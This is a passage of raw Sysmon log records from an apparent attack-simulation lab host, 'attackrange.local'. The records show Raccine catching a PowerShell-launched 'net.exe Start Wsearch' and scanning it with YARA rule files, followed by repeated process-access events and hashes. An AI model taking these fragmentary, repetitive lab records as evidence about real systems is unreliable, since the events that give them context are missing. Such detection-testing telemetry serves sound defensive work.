Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258789Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.504{9DBE88B5-587A-61B2-E009-010000000E02}3564144C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-DF09-010000000E02}7924C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258782Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.492{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-DF09-010000000E02}7924C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258781Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.492{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-DF09-010000000E02}7924C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258780Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.492{9DBE88B5-587A-61B2-DF09-010000000E02}7924C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258777Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.478{9DBE88B5-587A-61B2-DE09-010000000E02}41607948C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-DD09-010000000E02}7864C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258771Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.466{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-DD09-010000000E02}7864C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258770Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.466{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-DD09-010000000E02}7864C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258769Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.466{9DBE88B5-587A-61B2-DD09-010000000E02}7864C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258766Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.449{9DBE88B5-587A-61B2-DC09-010000000E02}46008120C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-DB09-010000000E02}904C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258760Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.438{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-DB09-010000000E02}904C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258759Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.438{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-DB09-010000000E02}904C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258758Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.438{9DBE88B5-587A-61B2-DB09-010000000E02}904C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258755Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.423{9DBE88B5-587A-61B2-DA09-010000000E02}79286560C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-D909-010000000E02}4980C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258749Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.412{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-D909-010000000E02}4980C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258748Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.412{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-D909-010000000E02}4980C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258747Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.412{9DBE88B5-587A-61B2-D909-010000000E02}4980C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258744Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.396{9DBE88B5-587A-61B2-D809-010000000E02}66003204C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-D709-010000000E02}6536C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258738Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.384{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-D709-010000000E02}6536C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258737Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.384{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-D709-010000000E02}6536C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258736Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.385{9DBE88B5-587A-61B2-D709-010000000E02}6536C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258733Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.369{9DBE88B5-587A-61B2-D609-010000000E02}53081924C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-D509-010000000E02}7052C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258725Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.356{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-D509-010000000E02}7052C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258724Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.356{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-D509-010000000E02}7052C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258723Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.356{9DBE88B5-587A-61B2-D509-010000000E02}7052C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258721Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.352{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258706Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.344{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258638Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.302{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258636Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.297{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258621Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.289{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258553Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.247{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program 